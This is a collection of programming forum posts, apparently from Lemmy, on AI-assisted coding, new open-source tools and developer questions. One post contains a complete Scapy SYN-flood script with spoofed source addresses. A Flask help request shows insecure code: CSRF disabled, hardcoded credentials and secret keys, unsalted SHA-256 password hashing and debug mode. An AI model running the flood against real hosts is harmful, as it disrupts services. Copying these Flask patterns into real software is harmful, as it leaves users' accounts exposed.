Programming

I just joined this platform, anyone willing to show me around?

I would love you hear what people are upto here;

• What projects are you working on?
• Is there any known collaborative efforts? (i.e popular projects)
• What are some good communities?

If you can answer my questions, I hope you leave a comment :v

PM's are open aswell if you prefer that :v

Just wanted to ask your opinion before I waste too much time in a new open source project that nobody wants.

Lemmy, Mastodon and Co are federated but users are concentrated on a few large instances which somewhat contradicts the original idea.

What do you think of a truly decentralised app where each instance is one user.

I am aware that there many reasons why this is a bad idea but I would like to hear from you why I should leave it, or encourage me to try it out.

Excerpt:

"Even within the coding, it's not working well," said Smiley. "I'll give you an example. Code can look right and pass the unit tests and still be wrong. The way you measure that is typically in benchmark tests. So a lot of these companies haven't engaged in a proper feedback loop to see what the impact of AI coding is on the outcomes they care about. Lines of code, number of [pull requests], these are liabilities. These are not measures of engineering excellence."

Measures of engineering excellence, said Smiley, include metrics like deployment frequency, lead time to production, change failure rate, mean time to restore, and incident severity. And we need a new set of metrics, he insists, to measure how AI affects engineering performance.

"We don't know what those are yet," he said.

One metric that might be helpful, he said, is measuring tokens burned to get to an approved pull request – a formally accepted change in software. That's the kind of thing that needs to be assessed to determine whether AI helps an organization's engineering practice.

To underscore the consequences of not having that kind of data, Smiley pointed to a recent attempt to rewrite SQLite in Rust using AI.

"It passed all the unit tests, the shape of the code looks right," he said. It's 3.7x more lines of code that performs 2,000 times worse than the actual SQLite. Two thousand times worse for a database is a non-viable product. It's a dumpster fire. Throw it away. All that money you spent on it is worthless."

All the optimism about using AI for coding, Smiley argues, comes from measuring the wrong things.

"Coding works if you measure lines of code and pull requests," he said. "Coding does not work if you measure quality and team performance. There's no evidence to suggest that that's moving in a positive direction."

cross-posted from: https://lemmy.zip/post/60932444

So some backstory here: I’m pretty much anti-AI, but I try to stay on top of things so I can make informed recommendations to leadership. Recently , they’ve come to me interested in using Replit “because it’s so easy” and they almost have a site built out how they want.

Besides the fact that it’s managed to blow up and nuke production, what are some pros/cons about it? I’m worried about things like BCDR, vulnerability scanning, separation of duties, etc. You know all the base things you should have in place too.

Hi there, I'm looking for good software architecture resources: blog, wiki or community.

I know good enough the basis of OOP and 'Design Pattern' and I'm looking for something more advanced.

One of my goal is to create local first software but anything with network and web archi are welcome too. 🙂

TLDR; I’ve been experimenting with react-like jsx-syntax with webcomponents to see if I could theoretically replace React in one of my projects. It is not ready for production use, but rather an exploration into CustomElements and modern browser capabilities.

https://github.com/positive-intentions/dim

The goal was to build functional Web Components that handle state management and DOM updates without the overhead of a massive JavaScript framework. By leveraging standard Web APIs and Proxy objects, I’ve managed to create a reactive programming model that feels familiar—using JSX—but stays much closer to the browser platform.

I wanted to see how far i could take web components before the architecture broke down. If you're interested in frontend software engineering or web standards, you might find the logic behind the updates (which avoid a traditional virtual DOM) interesting.

Full technical tutorial and deep dive: https://positive-intentions.com/docs/research/Tutorials/dim/dim-functional-webcomponents

Disclaimer: This project is not ready for production use. In fact, this project may be getting deprecated soon, but I’m sharing it because the unique details into custom elements and modern JavaScript performance might be interesting or educational for others exploring the web platform.

I wrote a minimalist fetch tool for Linux with Python programming language. Have a look: mlzfetch. UPDATE: Now with installation support (pip install .) Also I added a performance benchmark into README.

I know it's very old now but I still didn't know about this kind of low level attack. I don't even know if it works or not but I still found it interesting.

from scapy.all import *
import random

target_ip = "192.168.1.1"
target_port = 80

def syn_flood():
    while True:
        # Randomize source IP and port
        src_ip = ".".join(map(str, (random.randint(0,255) for _ in range(4))))
        src_port = random.randint(1024, 65535)
        
        ip = IP(src=src_ip, dst=target_ip)
        tcp = TCP(sport=src_port, dport=target_port, flags="S")
        
        send(ip/tcp, verbose=0)

syn_flood()  # Uncomment to run (requires proper authorization)

Hello,

it seems like an easy question but I tried everything google and AI told me but flask still giving me CSRF token mismatched error. I don't know how to disable it. I threw everything I found online to disable CSRF but I can't disable it. it's so annoying. here is the code:

import mysql.connector
from mysql.connector import Error

from flask import Flask, request, jsonify,redirect, url_for
from authlib.integrations.flask_client import OAuth
import os
from flask_cors import CORS
from flask_jwt_extended import JWTManager, create_access_token, jwt_required, get_jwt_identity
# from flask_wtf.csrf import csrf_exempt

import hashlib
from flask import Flask
from flask_wtf import CSRFProtect

app = Flask(__name__)
app.config['WTF_CSRF_ENABLED'] = False  # Disable CSRF globally

csrf = CSRFProtect(app)  # This will now be disabled


try:
    print("TESTING CONNECTION TO MYSQL DATABASE...")
    connection = mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    )

    if connection.is_connected():
        print("Connected to MySQL database")

        cur = connection.cursor()
        cur.execute("SELECT DATABASE();")
        record = cur.fetchone()
        print("You're connected to database: ", record)
except Error as e:
    print("Error while connecting to MySQL", e)
    exit(1)
finally:
    if connection.is_connected():
        cur.close()
        connection.close()
        print("MySQL connection is closed")
        print("TESTING DONE")


app.secret_key = "somethings_secret92387492837492387498"
app.config['SESSION_COOKIE_SAMESITE'] = 'Lax'
app.config['SESSION_COOKIE_SECURE'] = False
app.config['SESSION_COOKIE_HTTPONLY'] = True

CORS(app)
app.config['JWT_SECRET_KEY'] = "your_jwt_secret_key123487236428374628374628736"
jwt = JWTManager(app)


# OAuth configuration
oauth = OAuth(app)
google = oauth.register(
    name='google',
    client_id="CLIENT_ID",
    client_secret="CLIENT_SECRET",
    server_metadata_url='https://accounts.google.com/.well-known/openid-configuration',
    client_kwargs={
        'scope': 'openid email profile'
    }
)

@app.errorhandler(Exception)
def handle_exception(e):
    return jsonify({"error": str(e)}), 500

@app.route("/",)
@jwt_required()
def hello_world():
    return "<p>Hello, World!</p>"

@app.route("/register_by_email", methods=["POST"])
def register():
    username = request.form.get("username")
    email = request.form.get("email")
    password = request.form.get("password")

    with mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    ) as connection:
        with connection.cursor() as cursor:
            cursor.execute("INSERT INTO users (username, email) VALUES (%s, %s)", (username, email))
            cursor.execute("SELECT LAST_INSERT_ID()")
            user_id = cursor.fetchone()[0]
            password_hash = hashlib.sha256(password.encode()).hexdigest()
            cursor.execute("INSERT INTO user_passwords (user_id, password_hash) VALUES (%s, %s)", (user_id, password_hash))
            connection.commit()
    return jsonify({"message": "User registered successfully", "user_id": user_id}), 201

@app.route("/login_by_email", methods=["POST"])
def login():
    email = request.form.get("email")
    password = request.form.get("password")

    with mysql.connector.connect(
        host='localhost',
        database='test',
        user='root',
        password='MySql@123'
    ) as connection:
        with connection.cursor() as cursor:
            cursor.execute("SELECT id FROM users WHERE email = %s", (email,))
            user = cursor.fetchone()
            if not user:
                return jsonify({"error": "User not found"}), 404
            user_id = user[0]
            password_hash = hashlib.sha256(password.encode()).hexdigest()
            cursor.execute("SELECT * FROM user_passwords WHERE user_id = %s AND password_hash = %s", (user_id, password_hash))
            if cursor.fetchone():
                return jsonify({"message": "Login successful", "user_id": user_id, "access_token": create_access_token(identity=email)}), 200
            else:
                return jsonify({"error": "Invalid credentials"}), 401


@app.route("/google_oauth_url",methods = ["GET"])
def login_with_google():
    redirect_uri = url_for('callback', _external=True)
    return google.create_authorization_url(redirect_uri)




@app.route("/callback",methods = ["GET"])
# @csrf_exempt
def callback():
    token = google.authorize_access_token()
    user_info = token.get("userinfo")

    return jsonify(user_info)

if __name__ == "__main__":
    app.run(debug=True)

A compiled programming language with Korean keywuords, written in Rust - xodn348/han

I remember our professor at university (Gothenburg, Sweden) was teaching us object oriented programming and her example code had variable names and method names in Swedish because Java could deal with utf8 already beck then in 2008.

We were trying to convince one of the Arabic students to send in his stuff in Arabic, but he was too afraid.

Voiden is an offline-first, git-native API tool built on Markdown Voiden is an API client we have been building that takes a different approach from most existing tools.

It didn’t start with the idea of “building a better Postman”.

A bit of background. Over time, API tooling has become heavyweight: cloud dependencies for local work, forced accounts, proprietary formats, and workflows that break the moment you are offline. On top of that, time wasted on fixing API specs that don’t match the code, docs in separate random tools, tests also separate and an overall governance mess. Not to mention collaboration.

So we asked a simple question: What if an API tool respected how developers already work?

That led to a few core ideas:

• Offline-first , no accounts, no telemetry
• Git as the source of truth.
• Plain text files: specs, tests, and documentation live together in Markdown
• A programmable interface instead of static forms: requests are composed from reusable blocks (endpoints, headers, auth, params, bodies, etc.) that you can structure the way you want
• Plugin system for extending functionality rather than bloating the core with new features Some of our core plugins include gRPC,GraphQL,WebSockets,etc…

We have just also updated our docs to welcome community plugins, so teams can extend the tool for their own workflows or integrations. https://docs.voiden.md/docs/plugins/build-a-plugin

We opensourced Voiden because extensibility without openness just shifts the bottleneck. If (API) workflows should be transparent, the tools should be too.

Welcome to try out and share feedback- happy to chat with everyone.

Strong opinions are encouraged. :)

Github : https://github.com/VoidenHQ/voiden

Download here : https://voiden.md/download

Thank you Microslop

Selected developer quotes:

“I’m torn. I’d like to help provide updated data on this question but also I really like using AI!” — a developer from the original study early-2025 when asked to participate in the late-2025 study.

“I found I am actually heavily biased sampling the issues … I avoid issues like AI can finish things in just 2 hours, but I have to spend 20 hours. I will feel so painful if the task is decided as AI-disallowed.” — a developer from the new study noting selection effects when choosing what tasks to include in the study.

“my head’s going to explode if I try to do too much the old fashioned way because it’s like trying to get across the city walking when all of a sudden I was more used to taking an Uber.” — a developer from the new study noting selection effects when choosing what tasks to include in the study.

Hello,

recently I was working on a project entirely made by AI. at first it looked plausible but as I dig deeper into the code I found out ton of security issues. we solved the security issues one by one. ( thankfully the site isn't released yet and only have beta testing users )

my question is that is it considered a security issue if I let the client ( browser ) make the supabase api call instead of routing those requests through the backend ( vercel ) even when I have made policies that prevents unauthorized users from submitting INSERT queries however I am still not sure if this is enough.

one thing that comes in my mind is that any authorized user can just spam the database and fill it with junk data but I think I can just ban that user and delete all the junk data relatively easily using a SQL query?

the thing is that I don't want to refactor AI code and make it "use server" instead of "use client". since I have to make a ton of changes and I am still learning Nextjs. ( thinking about using AI to fix AI code but I don't think it will work and don't want more AI slop in the codebase )

any suggestions are appreciated!

Over the decades, I’ve seen the common practices around creating functions change quite a bit.

Just like fast fashion replaced tailors with factory workers and machine operators, fast software will replace programmers with AI operators. And the market will demand many of them. Many more than large software companies employ today.

The new world will need more programmers (AI operators) than it needs now. Because the demand for custom software will soon start growing. Everyone will want their own Photoshop. Every developer will want their own IDE and their own Linux. And they will throw them away without hesitation. Just like I throw away my shoes every year and get new ones.

I share this here to see what are your thoughts on this.